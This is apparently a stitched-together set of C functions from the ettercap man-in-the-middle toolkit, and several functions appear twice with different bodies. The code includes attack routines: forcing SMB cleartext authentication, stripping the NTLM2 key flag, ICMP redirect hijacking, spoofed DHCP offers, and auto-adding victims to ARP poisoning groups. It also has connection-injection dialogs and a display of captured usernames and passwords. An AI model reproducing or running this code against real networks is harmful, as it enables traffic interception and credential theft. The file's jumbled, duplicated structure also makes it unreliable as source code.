/* Clear the encryption bit in the SecurityModel request */
static void parse_smb(struct packet_object *po)
{
SMB_header *smb;
NetBIOS_header *NetBIOS;
u_char *ptr;
char tmp[MAX_ASCII_ADDR_LEN];
/* It's unuseful to modify packets that won't be forwarded */
if (!(po->flags & PO_FORWARDABLE))
return;
/* Catch netbios and smb headers */
NetBIOS = (NetBIOS_header *)po->DATA.data;
smb = (SMB_header *)(NetBIOS + 1);
/* Let's go to the data */
ptr = (u_char *)(smb + 1);
/* According to the Hook Point we are sure that this is
* a NegotiateProtocol response packet.
* Now we can change the Security Mode
* 010 (encrypted) 000 (plaintext)
*/
if (ptr[3] & 2) {
ptr[3] ^= 2;
USER_MSG("smb_clear: Forced SMB clear text auth %s -> ", ip_addr_ntoa(&po->L3.src, tmp));
USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp));
po->flags |= PO_MODIFIED;
}
}
/*
* show the data in a joined window
*/
static void curses_connection_data_join(void)
{
char src[MAX_ASCII_ADDR_LEN];
char dst[MAX_ASCII_ADDR_LEN];
char title[64];
DEBUG_MSG("curses_connection_data_join");
if (wdg_conndata) {
struct conn_object *tmp_conn = curr_conn;
wdg_destroy_object(&wdg_conndata);
curses_destroy_conndata();
curr_conn = tmp_conn;
}
/* don't timeout this connection */
curr_conn->flags |= CONN_VIEWING;
wdg_create_object(&wdg_conndata, WDG_COMPOUND, WDG_OBJ_WANT_FOCUS);
wdg_set_color(wdg_conndata, WDG_COLOR_SCREEN, EC_COLOR);
wdg_set_color(wdg_conndata, WDG_COLOR_WINDOW, EC_COLOR);
wdg_set_color(wdg_conndata, WDG_COLOR_FOCUS, EC_COLOR_FOCUS);
wdg_set_color(wdg_conndata, WDG_COLOR_TITLE, EC_COLOR_TITLE);
wdg_set_title(wdg_conndata, "Connection data", WDG_ALIGN_LEFT);
wdg_set_size(wdg_conndata, 1, 2, -1, SYSMSG_WIN_SIZE - 1);
wdg_create_object(&wdg_join, WDG_SCROLL, 0);
snprintf(title, 64, "%s:%d - %s:%d", ip_addr_ntoa(&curr_conn->L3_addr1, src), ntohs(curr_conn->L4_addr1),
ip_addr_ntoa(&curr_conn->L3_addr2, dst), ntohs(curr_conn->L4_addr2));
wdg_set_title(wdg_join, title, WDG_ALIGN_LEFT);
wdg_set_color(wdg_join, WDG_COLOR_TITLE, EC_COLOR_TITLE);
wdg_set_color(wdg_join, WDG_COLOR_FOCUS, EC_COLOR_FOCUS);
wdg_set_size(wdg_join, 2, 3, -2, SYSMSG_WIN_SIZE - 2);
/* set the buffers */
wdg_scroll_set_lines(wdg_join, GBL_CONF->connection_buffer / (current_screen.cols / 2) );
/* link the widget together within the compound */
wdg_compound_add(wdg_conndata, wdg_join);
/* add the destroy callback */
wdg_add_destroy_key(wdg_conndata, CTRL('Q'), curses_destroy_conndata);
/*
* do not add inject callback because we can determine where to inject in
* joined mode...
*/
wdg_compound_add_callback(wdg_conndata, 'j', curses_connection_data_split);
wdg_compound_add_callback(wdg_conndata, 'k', curses_connection_kill_wrapper);
wdg_compound_add_callback(wdg_conndata, ' ', curses_connection_data_help);
wdg_draw_object(wdg_conndata);
wdg_set_focus(wdg_conndata);
/* print the old data */
connbuf_print(&curr_conn->data, join_print);
/* add the hook on the connection to receive data only from it */
conntrack_hook_conn_add(curr_conn, join_print_po);
}
/*
* the redirect function.
*
* redirect all the traffic that goes thru the gateway
* check the dst mac address and the dst ip address.
*
* respect the TARGETs for the redirections
*/
static void icmp_redirect(struct packet_object *po)
{
struct ip_list *i;
char tmp[MAX_ASCII_ADDR_LEN];
/* retrieve the gw ip */
i = LIST_FIRST(&redirected_gw.ips);
/* the packet must be directed to the gateway */
if (memcmp(po->L2.dst, redirected_gw.mac, MEDIA_ADDR_LEN))
return;
/*
* if the packet endpoint is the gateway, skip it.
* we are interested only in packet going THRU the
* gateway, not TO the gateway
*/
if (!ip_addr_cmp(&po->L3.dst, &i->ip))
return;
/* redirect only the connection that match the TARGETS */
EXECUTE(GBL_SNIFF->interesting, po);
/* the packet is not interesting */
if ( po->flags & PO_IGNORE )
return;
USER_MSG("ICMP redirected %s:%d -> ", ip_addr_ntoa(&po->L3.src, tmp), ntohs(po->L4.src));
USER_MSG("%s:%d\n", ip_addr_ntoa(&po->L3.dst, tmp), ntohs(po->L4.dst));
/* send the ICMP redirect */
send_icmp_redir(ICMP_REDIRECT_HOST, &i->ip, &GBL_IFACE->ip, po);
}
/*
* parse the packet for ettercap traces
*/
static void parse_tcp(struct packet_object *po)
{
struct libnet_tcp_hdr *tcp;
char tmp[MAX_ASCII_ADDR_LEN];
char tmp2[MAX_ASCII_ADDR_LEN];
tcp = (struct libnet_tcp_hdr *)po->L4.header;
switch (ntohl(tcp->th_seq)) {
case EC_MAGIC_16:
USER_MSG("ettercap traces (tcp) from %s...\n", ip_addr_ntoa(&po->L3.src, tmp));
break;
case 6969:
USER_MSG("ettercap plugin (shadow) is scanning from %s to %s:%d...\n", ip_addr_ntoa(&po->L3.src, tmp), ip_addr_ntoa(&po->L3.dst, tmp2), ntohs(po->L4.dst));
break;
case 0xabadc0de:
if (ntohl(tcp->th_ack) == 0xabadc0de)
USER_MSG("ettercap plugin (spectre) is flooding the lan.\n");
else
USER_MSG("ettercap plugin (golem) is DOSing from %s to %s...\n", ip_addr_ntoa(&po->L3.src, tmp), ip_addr_ntoa(&po->L3.dst, tmp2));
break;
}
if (ntohs(tcp->th_sport) == EC_MAGIC_16 && (tcp->th_flags & TH_SYN) )
USER_MSG("ettercap NG plugin (gw_discover) is trying to dicover the gateway from %s...\n", ip_addr_ntoa(&po->L3.src, tmp));
}
static void display_headers(struct packet_object *po)
{
/* it is at least 26... rounding up */
char time[28];
char tmp1[MAX_ASCII_ADDR_LEN];
char tmp2[MAX_ASCII_ADDR_LEN];
char flags[8];
char *p = flags;
char proto[5];
memset(flags, 0, sizeof(flags));
memset(proto, 0, sizeof(proto));
fprintf(stdout, "\n\n");
/* remove the final '\n' */
strncpy(time, ctime((time_t *)&po->ts.tv_sec), 28);
time[strlen(time)-1] = 0;
/* displat the date */
fprintf(stdout, "%s\n", time);
//fprintf(stdout, "%x %x\n", (u_int)po->ts.tv_sec, (u_int)po->ts.tv_usec);
if (GBL_OPTIONS->ext_headers) {
/* display the mac addresses */
mac_addr_ntoa(po->L2.src, tmp1);
mac_addr_ntoa(po->L2.dst, tmp2);
fprintf(stdout, "%17s --> %17s\n", tmp1, tmp2 );
}
/* calculate the flags */
if (po->L4.flags & TH_SYN) *p++ = 'S';
if (po->L4.flags & TH_FIN) *p++ = 'F';
if (po->L4.flags & TH_RST) *p++ = 'R';
if (po->L4.flags & TH_ACK) *p++ = 'A';
if (po->L4.flags & TH_PSH) *p++ = 'P';
/* determine the proto */
switch(po->L4.proto) {
case NL_TYPE_TCP:
strncpy(proto, "TCP", 3);
break;
case NL_TYPE_UDP:
strncpy(proto, "UDP", 3);
break;
}
/* display the ip addresses */
ip_addr_ntoa(&po->L3.src, tmp1);
ip_addr_ntoa(&po->L3.dst, tmp2);
fprintf(stdout, "%s %s:%d --> %s:%d | %s\n", proto, tmp1, ntohs(po->L4.src),
tmp2, ntohs(po->L4.dst),
flags);
fprintf(stdout, "\n");
}
/*
* parse the packet for ettercap traces
*/
static void parse_ip(struct packet_object *po)
{
struct libnet_ipv4_hdr *ip;
char tmp[MAX_ASCII_ADDR_LEN];
char tmp2[MAX_ASCII_ADDR_LEN];
ip = (struct libnet_ipv4_hdr *)po->L3.header;
if (ntohs(ip->ip_id) == EC_MAGIC_16)
USER_MSG("ettercap traces (ip) from %s...\n", ip_addr_ntoa(&po->L3.src, tmp));
if (ntohs(ip->ip_id) == 0xbadc)
USER_MSG("ettercap plugin (banshee) is killing from %s to %s...\n", ip_addr_ntoa(&po->L3.src, tmp), ip_addr_ntoa(&po->L3.dst, tmp2));
}
static void display_headers(struct packet_object *po)
{
char tmp1[MAX_ASCII_ADDR_LEN];
char tmp2[MAX_ASCII_ADDR_LEN];
char flags[8];
char *p = flags;
char proto[5];
memset(flags, 0, sizeof(flags));
memset(proto, 0, sizeof(proto));
/* display the date. ec_ctime() has no newline at end. */
fprintf(stdout, "\n\n%s [%lu]\n", ec_ctime(&po->ts), po->ts.tv_usec);
if (GBL_OPTIONS->ext_headers) {
/* display the mac addresses */
mac_addr_ntoa(po->L2.src, tmp1);
mac_addr_ntoa(po->L2.dst, tmp2);
fprintf(stdout, "%17s --> %17s\n", tmp1, tmp2 );
}
/* calculate the flags */
if (po->L4.flags & TH_SYN) *p++ = 'S';
if (po->L4.flags & TH_FIN) *p++ = 'F';
if (po->L4.flags & TH_RST) *p++ = 'R';
if (po->L4.flags & TH_ACK) *p++ = 'A';
if (po->L4.flags & TH_PSH) *p++ = 'P';
/* determine the proto */
switch(po->L4.proto) {
case NL_TYPE_TCP:
strncpy(proto, "TCP", 3);
break;
case NL_TYPE_UDP:
strncpy(proto, "UDP", 3);
break;
}
/* display the ip addresses */
ip_addr_ntoa(&po->L3.src, tmp1);
ip_addr_ntoa(&po->L3.dst, tmp2);
fprintf(stdout, "%s %s:%d --> %s:%d | %s\n", proto, tmp1, ntohs(po->L4.src),
tmp2, ntohs(po->L4.dst),
flags);
fprintf(stdout, "\n");
}
/* Parse the arp request */
static void parse_arp(struct packet_object *po)
{
char tmp1[MAX_ASCII_ADDR_LEN];
char tmp2[MAX_ASCII_ADDR_LEN];
USER_MSG("find_conn: Probable connection attempt %s -> %s\n", ip_addr_ntoa(&po->L3.src, tmp1), ip_addr_ntoa(&po->L3.dst, tmp2));
}
/*
* init the ICMP REDIRECT attack
*/
static int icmp_redirect_start(char *args)
{
struct ip_list *i;
char tmp[MAX_ASCII_ADDR_LEN];
DEBUG_MSG("icmp_redirect_start");
/* check the parameter */
if (!strcmp(args, "")) {
SEMIFATAL_ERROR("ICMP redirect needs a parameter.\n");
} else {
char tmp[strlen(args)+2];
/* add the / to be able to use the target parsing function */
sprintf(tmp, "%s/", args);
if (compile_target(tmp, &redirected_gw) != ESUCCESS)
SEMIFATAL_ERROR("Wrong target parameter");
}
/* we need both mac and ip addresses */
if (redirected_gw.all_mac || redirected_gw.all_ip)
SEMIFATAL_ERROR("You must specify both MAC and IP addresses for the GW");
i = LIST_FIRST(&redirected_gw.ips);
USER_MSG("ICMP redirect: victim GW %s\n", ip_addr_ntoa(&i->ip, tmp));
/* add the hook to receive all the tcp and udp packets */
hook_add(HOOK_PACKET_TCP, &icmp_redirect);
hook_add(HOOK_PACKET_UDP, &icmp_redirect);
return ESUCCESS;
}
/* Clear the encryption bit in the SecurityModel request */
static void parse_smb(struct packet_object *po)
{
SMB_header *smb;
NetBIOS_header *NetBIOS;
u_char *ptr;
u_int32 *Flags;
char tmp[MAX_ASCII_ADDR_LEN];
/* It's unuseful to modify packets that won't be forwarded */
if (!(po->flags & PO_FORWARDABLE))
return;
/* Catch netbios and smb headers */
NetBIOS = (NetBIOS_header *)po->DATA.data;
smb = (SMB_header *)(NetBIOS + 1);
/* Let's go to the data */
ptr = (u_char *)(smb + 1);
/* According to the Hook Point we are sure that this is
* a SessionSetup request packet.
* Let's check if it's NTLMSSP_NEGOTIATE
*/
ptr += ( (*ptr) * 2 + 3 );
if ( (ptr = (char *)memmem(ptr, 128, "NTLMSSP", 8)) == NULL)
return;
ptr = strchr(ptr, 0);
ptr++;
/* NTLMSSP_NEGOTIATE */
if (*ptr != 1)
return;
ptr+=4;
/* Catch the flags */
Flags = (u_int32 *)ptr;
if (*Flags & ntohl(NTLM2_KEY)) {
*Flags ^= ntohl(NTLM2_KEY);
USER_MSG("smb_down: Forced no NTLM2 key %s -> ", ip_addr_ntoa(&po->L3.src, tmp));
USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp));
po->flags |= PO_MODIFIED;
}
}
/* Parse the arp packets */
static void parse_arp(struct packet_object *po)
{
char tmp[MAX_ASCII_ADDR_LEN];
char tmp2[MAX_ASCII_ADDR_LEN];
struct ip_list *t;
/* if arp poisonin is not running, do nothing */
if (!is_mitm_active("arp"))
return;
/* don't add our addresses */
if (!ip_addr_cmp(&EC_GBL_IFACE->ip, &po->L3.src))
return;
if (!memcmp(&EC_GBL_IFACE->mac, &po->L2.src, MEDIA_ADDR_LEN))
return;
/* don't add undefined address */
if (ip_addr_is_zero(&po->L3.src))
return;
/* search in target 1 */
if (EC_GBL_TARGET1->all_ip) {
if (add_to_victims(&arp_group_one, po) == E_SUCCESS)
USER_MSG("autoadd: %s %s added to GROUP1\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2));
} else {
LIST_FOREACH(t, &EC_GBL_TARGET1->ips, next)
if (!ip_addr_cmp(&t->ip, &po->L3.src))
if (add_to_victims(&arp_group_one, po) == E_SUCCESS)
USER_MSG("autoadd: %s %s added to GROUP1\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2));
}
/* search in target 2 */
if (EC_GBL_TARGET2->all_ip) {
if (add_to_victims(&arp_group_two, po) == E_SUCCESS)
USER_MSG("autoadd: %s %s added to GROUP2\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2));
} else {
LIST_FOREACH(t, &EC_GBL_TARGET2->ips, next)
if (!ip_addr_cmp(&t->ip, &po->L3.src))
if (add_to_victims(&arp_group_two, po) == E_SUCCESS)
USER_MSG("autoadd: %s %s added to GROUP2\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2));
}
}
/*
* parse the packet for ettercap traces
*/
static void parse_icmp(struct packet_object *po)
{
struct libnet_icmpv4_hdr *icmp;
char tmp[MAX_ASCII_ADDR_LEN];
icmp = (struct libnet_icmpv4_hdr *)po->L4.header;
if (ntohs(icmp->hun.echo.id) == EC_MAGIC_16 && ntohs(icmp->hun.echo.seq) == EC_MAGIC_16)
USER_MSG("ettercap traces (icmp) from %s...\n", ip_addr_ntoa(&po->L3.src, tmp));
}
/*
* add a victim to the right group.
* the arp poisoning thread will automatically pick it up
* since this function modifies directy the mitm internal lists
*/
static int add_to_victims(void *group, struct packet_object *po)
{
char tmp[MAX_ASCII_ADDR_LEN];
struct hosts_list *h;
LIST_HEAD(, hosts_list) *head = group;
(void)tmp;
/* search if it was already inserted in the list */
LIST_FOREACH(h, head, next)
if (!ip_addr_cmp(&h->ip, &po->L3.src))
return -E_NOTHANDLED;
SAFE_CALLOC(h, 1, sizeof(struct hosts_list));
memcpy(&h->ip, &po->L3.src, sizeof(struct ip_addr));
memcpy(&h->mac, &po->L2.src, MEDIA_ADDR_LEN);
DEBUG_MSG("autoadd: added %s to arp groups", ip_addr_ntoa(&h->ip, tmp));
LIST_INSERT_HEAD(head, h, next);
/* add the host even in the hosts list */
LIST_FOREACH(h, &EC_GBL_HOSTLIST, next)
if (!ip_addr_cmp(&h->ip, &po->L3.src))
return E_SUCCESS;
/*
* we need another copy, since the group lists
* are freed by the mitm process
*/
SAFE_CALLOC(h, 1, sizeof(struct hosts_list));
memcpy(&h->ip, &po->L3.src, sizeof(struct ip_addr));
memcpy(&h->mac, &po->L2.src, MEDIA_ADDR_LEN);
DEBUG_MSG("autoadd: added %s to hosts list", ip_addr_ntoa(&h->ip, tmp));
LIST_INSERT_HEAD(&EC_GBL_HOSTLIST, h, next);
return E_SUCCESS;
}
/*
* parses the discovery message and send the spoofed reply
*/
static void dhcp_spoofing_disc(struct packet_object *po)
{
char dhcp_hdr[LIBNET_DHCPV4_H];
struct libnet_dhcpv4_hdr *dhcp;
char tmp[MAX_ASCII_ADDR_LEN];
DEBUG_MSG("dhcp_spoofing_disc");
/* no more ip available in the pool */
if (dhcp_free_ip == SLIST_END(&dhcp_ip_pool.ips))
return;
/* get a local copy of the dhcp header */
memcpy(dhcp_hdr, po->DATA.data, LIBNET_DHCPV4_H);
dhcp = (struct libnet_dhcpv4_hdr *)dhcp_hdr;
/* use the same dhcp header, but change the type of the message */
dhcp->dhcp_opcode = LIBNET_DHCP_REPLY;
/* this is a dhcp OFFER */
dhcp_options[2] = DHCP_OFFER;
/* set the free ip from the pool */
dhcp->dhcp_yip = ip_addr_to_int32(&dhcp_free_ip->ip.addr);
/* set it in the header */
dhcp->dhcp_sip = ip_addr_to_int32(&GBL_IFACE->ip.addr);
/* set it in the options */
ip_addr_cpy((u_char*)dhcp_options + 5, &GBL_IFACE->ip);
/* send the packet */
send_dhcp_reply(&GBL_IFACE->ip, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen);
USER_MSG("DHCP spoofing: fake OFFER [%s] ", mac_addr_ntoa(po->L2.src, tmp));
USER_MSG("offering %s \n", ip_addr_ntoa(&dhcp_free_ip->ip, tmp));
/* move the pointer to the next ip */
dhcp_free_ip = LIST_NEXT(dhcp_free_ip, next);
}
void get_hw_info(void)
{
u_long ip;
struct libnet_ether_addr *ea;
bpf_u_int32 network, netmask;
char pcap_errbuf[PCAP_ERRBUF_SIZE];
/* dont touch the interface reading from file */
if (!GBL_LNET->lnet || GBL_OPTIONS->read) {
DEBUG_MSG("get_hw_info: skipping... (not initialized)");
return;
}
DEBUG_MSG("get_hw_info");
/* get the ip address */
ip = libnet_get_ipaddr4(GBL_LNET->lnet);
/* if ip is equal to -1 there was an error */
if (ip != (u_long)~0) {
/* the interface has an ip address */
if (ip != 0)
GBL_IFACE->configured = 1;
/* save the ip address */
ip_addr_init(&GBL_IFACE->ip, AF_INET, (char *)&ip);
if (pcap_lookupnet(GBL_OPTIONS->iface, &network, &netmask, pcap_errbuf) == -1)
ERROR_MSG("%s", pcap_errbuf);
ip_addr_init(&GBL_IFACE->network, AF_INET, (char *)&network);
/* the user has specified a different netmask, use it */
if (GBL_OPTIONS->netmask) {
struct in_addr net;
/* sanity check */
if (inet_aton(GBL_OPTIONS->netmask, &net) == 0)
FATAL_ERROR("Invalid netmask %s", GBL_OPTIONS->netmask);
ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&net);
} else
ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&netmask);
} else
DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface);
/* get the mac address */
ea = libnet_get_hwaddr(GBL_LNET->lnet);
if (ea != NULL)
memcpy(GBL_IFACE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN);
else
DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface);
/* get the MTU */
GBL_IFACE->mtu = get_iface_mtu(GBL_OPTIONS->iface);
/* check the mtu */
if (GBL_IFACE->mtu > INT16_MAX)
FATAL_ERROR("MTU too large");
USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface,
mac_addr_ntoa(GBL_IFACE->mac, pcap_errbuf));
USER_MSG("%16s ", ip_addr_ntoa(&GBL_IFACE->ip, pcap_errbuf));
USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_IFACE->netmask, pcap_errbuf) );
/* if not in bridged sniffing, return */
if (GBL_SNIFF->type != SM_BRIDGED)
return;
ip = libnet_get_ipaddr4(GBL_LNET->lnet_bridge);
/* if ip is equal to -1 there was an error */
if (ip != (u_long)~0) {
ip_addr_init(&GBL_BRIDGE->ip, AF_INET, (char *)&ip);
if (pcap_lookupnet(GBL_OPTIONS->iface_bridge, &network, &netmask, pcap_errbuf) == -1)
ERROR_MSG("%s", pcap_errbuf);
ip_addr_init(&GBL_BRIDGE->network, AF_INET, (char *)&network);
ip_addr_init(&GBL_BRIDGE->netmask, AF_INET, (char *)&netmask);
} else
DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface_bridge);
ea = libnet_get_hwaddr(GBL_LNET->lnet_bridge);
if (ea != NULL)
memcpy(GBL_BRIDGE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN);
else
DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface_bridge);
/* get the MTU */
GBL_BRIDGE->mtu = get_iface_mtu(GBL_OPTIONS->iface_bridge);
if (GBL_BRIDGE->mtu > INT16_MAX)
FATAL_ERROR("MTU too large");
USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface_bridge,
mac_addr_ntoa(GBL_BRIDGE->mac, pcap_errbuf));
USER_MSG("%16s ", ip_addr_ntoa(&GBL_BRIDGE->ip, pcap_errbuf));
USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_BRIDGE->netmask, pcap_errbuf) );
/* some sanity checks */
if (GBL_BRIDGE->mtu != GBL_IFACE->mtu)
FATAL_ERROR("The two interfaces must have the same MTU.");
if (!memcmp(GBL_BRIDGE->mac, GBL_IFACE->mac, MEDIA_ADDR_LEN))
FATAL_ERROR("The two bridged interfaces must be phisically different");
}
/*
* inject interactively with the user
*/
static void gtkui_connection_inject(void)
{
GtkWidget *dialog, *text, *label, *vbox, *frame;
GtkWidget *button1, *button2, *hbox;
GtkTextBuffer *buf;
GtkTextIter start, end;
char tmp[MAX_ASCII_ADDR_LEN];
gint response = 0;
DEBUG_MSG("gtk_connection_inject");
if(curr_conn == NULL)
return;
dialog = gtk_dialog_new_with_buttons("Character Injection", GTK_WINDOW (window),
GTK_DIALOG_MODAL, GTK_STOCK_OK, GTK_RESPONSE_OK,
GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);
gtk_window_set_default_size(GTK_WINDOW (dialog), 400, 200);
gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE);
gtk_container_set_border_width(GTK_CONTAINER (dialog), 5);
vbox = GTK_DIALOG (dialog)->vbox;
label = gtk_label_new ("Packet destination:");
gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5);
gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0);
gtk_widget_show(label);
hbox = gtk_hbox_new(FALSE, 5);
gtk_box_pack_start (GTK_BOX (vbox), hbox, FALSE, FALSE, 0);
gtk_widget_show(hbox);
button1 = gtk_radio_button_new_with_label(NULL, ip_addr_ntoa(&curr_conn->L3_addr2, tmp));
gtk_box_pack_start(GTK_BOX(hbox), button1, FALSE, FALSE, 0);
gtk_widget_show(button1);
button2 = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (button1),
ip_addr_ntoa(&curr_conn->L3_addr1, tmp));
gtk_box_pack_start(GTK_BOX(hbox), button2, FALSE, FALSE, 0);
gtk_widget_show(button2);
label = gtk_label_new ("Characters to be injected:");
gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5);
gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0);
gtk_widget_show(label);
frame = gtk_frame_new(NULL);
gtk_frame_set_shadow_type(GTK_FRAME (frame), GTK_SHADOW_IN);
gtk_box_pack_start(GTK_BOX (vbox), frame, TRUE, TRUE, 5);
gtk_widget_show(frame);
text = gtk_text_view_new();
gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (text), GTK_WRAP_CHAR);
gtk_container_add(GTK_CONTAINER (frame), text);
gtk_widget_show(text);
response = gtk_dialog_run(GTK_DIALOG(dialog));
if(response == GTK_RESPONSE_OK) {
gtk_widget_hide(dialog);
SAFE_REALLOC(injectbuf, 501 * sizeof(char));
memset(injectbuf, 0, 501);
buf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (text));
/* initialize iters for get text */
gtk_text_buffer_get_start_iter(buf, &start);
gtk_text_buffer_get_start_iter(buf, &end);
/* advance end iter to end of text, 500 char max */
gtk_text_iter_forward_chars(&end, 500);
strncpy(injectbuf, gtk_text_buffer_get_text(buf, &start, &end, FALSE), 501);
if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1)))
gtkui_inject_user(1);
else if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2)))
gtkui_inject_user(2);
}
gtk_widget_destroy(dialog);
}
/*
* inject form a file
*/
static void gtkui_connection_inject_file(void)
{
/* START */
GtkWidget *dialog, *label, *vbox, *hbox;
GtkWidget *button1, *button2, *button, *entry;
char tmp[MAX_ASCII_ADDR_LEN];
const char *filename = NULL;
gint response = 0;
DEBUG_MSG("gtk_connection_inject_file");
if(curr_conn == NULL)
return;
dialog = gtk_dialog_new_with_buttons("Character Injection", GTK_WINDOW (window),
GTK_DIALOG_MODAL, GTK_STOCK_OK, GTK_RESPONSE_OK,
GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);
gtk_window_set_default_size(GTK_WINDOW (dialog), 400, 150);
gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE);
gtk_container_set_border_width(GTK_CONTAINER (dialog), 5);
vbox = GTK_DIALOG (dialog)->vbox;
label = gtk_label_new ("Packet destination:");
gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5);
gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0);
gtk_widget_show(label);
hbox = gtk_hbox_new(FALSE, 5);
gtk_box_pack_start (GTK_BOX (vbox), hbox, FALSE, FALSE, 0);
gtk_widget_show(hbox);
button1 = gtk_radio_button_new_with_label(NULL, ip_addr_ntoa(&curr_conn->L3_addr2, tmp));
gtk_box_pack_start(GTK_BOX(hbox), button1, FALSE, FALSE, 0);
gtk_widget_show(button1);
button2 = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (button1),
ip_addr_ntoa(&curr_conn->L3_addr1, tmp));
gtk_box_pack_start(GTK_BOX(hbox), button2, FALSE, FALSE, 0);
gtk_widget_show(button2);
label = gtk_label_new ("File to inject:");
gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5);
gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0);
gtk_widget_show(label);
hbox = gtk_hbox_new(FALSE, 5);
gtk_box_pack_start (GTK_BOX (vbox), hbox, FALSE, FALSE, 0);
gtk_widget_show(hbox);
entry = gtk_entry_new();
gtk_box_pack_start(GTK_BOX (hbox), entry, TRUE, TRUE, 0);
gtk_widget_show(entry);
button = gtk_button_new_with_label("...");
gtk_box_pack_start(GTK_BOX (hbox), button, FALSE, FALSE, 0);
g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_filename_browse), entry);
gtk_widget_show(button);
response = gtk_dialog_run(GTK_DIALOG (dialog));
if(response == GTK_RESPONSE_OK) {
gtk_widget_hide(dialog);
filename = gtk_entry_get_text(GTK_ENTRY (entry));
if(filename && strlen(filename) > 0) {
if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1)))
gtkui_inject_file(filename, 1);
else if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2)))
gtkui_inject_file(filename, 2);
}
}
gtk_widget_destroy(dialog);
}
/*
* details for a connection
*/
static void gtkui_connection_detail(void)
{
GtkTreeIter iter;
GtkTreeModel *model;
GtkTextBuffer *textbuf;
char line[200];
struct conn_tail *c = NULL;
char tmp[MAX_ASCII_ADDR_LEN];
char *proto = "";
char name[MAX_HOSTNAME_LEN];
DEBUG_MSG("gtk_connection_detail");
model = GTK_TREE_MODEL (ls_conns);
if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) {
gtk_tree_model_get (model, &iter, 9, &c, -1);
} else
return; /* nothing is selected */
if(!c || !c->co)
return;
textbuf = gtkui_details_window("Connection Details");
snprintf(line, 200, "Source MAC address : %s\n", mac_addr_ntoa(c->co->L2_addr1, tmp));
gtkui_details_print(textbuf, line);
snprintf(line, 200, "Destination MAC address : %s\n\n", mac_addr_ntoa(c->co->L2_addr2, tmp));
gtkui_details_print(textbuf, line);
snprintf(line, 200, "Source IP address : \t%s\n", ip_addr_ntoa(&(c->co->L3_addr1), tmp));
gtkui_details_print(textbuf, line);
if (host_iptoa(&(c->co->L3_addr1), name) == ESUCCESS) {
snprintf(line, 200, " %s\n", name);
gtkui_details_print(textbuf, line);
}
snprintf(line, 200, "Destination IP address : \t%s\n", ip_addr_ntoa(&(c->co->L3_addr2), tmp));
gtkui_details_print(textbuf, line);
if (host_iptoa(&(c->co->L3_addr2), name) == ESUCCESS) {
snprintf(line, 200, " %s\n", name);
gtkui_details_print(textbuf, line);
}
gtkui_details_print(textbuf, "\n");
/* Protocol */
switch (c->co->L4_proto) {
case NL_TYPE_UDP:
proto = "UDP";
break;
case NL_TYPE_TCP:
proto = "TCP";
break;
}
snprintf(line, 200, "Protocol: \t\t\t%s\n", proto);
gtkui_details_print(textbuf, line);
snprintf(line, 200, "Source port: \t\t%-5d %s\n", ntohs(c->co->L4_addr1), service_search(c->co->L4_addr1, c->co->L4_proto));
gtkui_details_print(textbuf, line);
snprintf(line, 200, "Destination port: \t%-5d %s\n\n", ntohs(c->co->L4_addr2), service_search(c->co->L4_addr2, c->co->L4_proto));
gtkui_details_print(textbuf, line);
snprintf(line, 200, "Transferred bytes: %d\n\n", c->co->xferred);
gtkui_details_print(textbuf, line);
/* Login Information */
if (c->co->DISSECTOR.user) {
snprintf(line, 200, "Account: \t%s / %s", c->co->DISSECTOR.user, c->co->DISSECTOR.pass);
gtkui_details_print(textbuf, line);
if (c->co->DISSECTOR.info) {
snprintf(line, 200, " Additional Info: %s\n", c->co->DISSECTOR.info);
gtkui_details_print(textbuf, line);
}
}
}
/*
* show the data in a joined window
*/
static void gtkui_connection_data_join(void)
{
GtkWidget *hbox, *vbox, *label, *scrolled, *button, *child;
GtkTextIter iter;
#define TITLE_LEN (MAX_ASCII_ADDR_LEN * 2) + 6
char src[MAX_ASCII_ADDR_LEN];
char dst[MAX_ASCII_ADDR_LEN];
char title[TITLE_LEN];
DEBUG_MSG("gtk_connection_data_join");
/* if we're switching views, make sure old hook is gone */
conntrack_hook_conn_del(curr_conn, split_print_po);
if(data_window) {
child = gtk_bin_get_child(GTK_BIN (data_window));
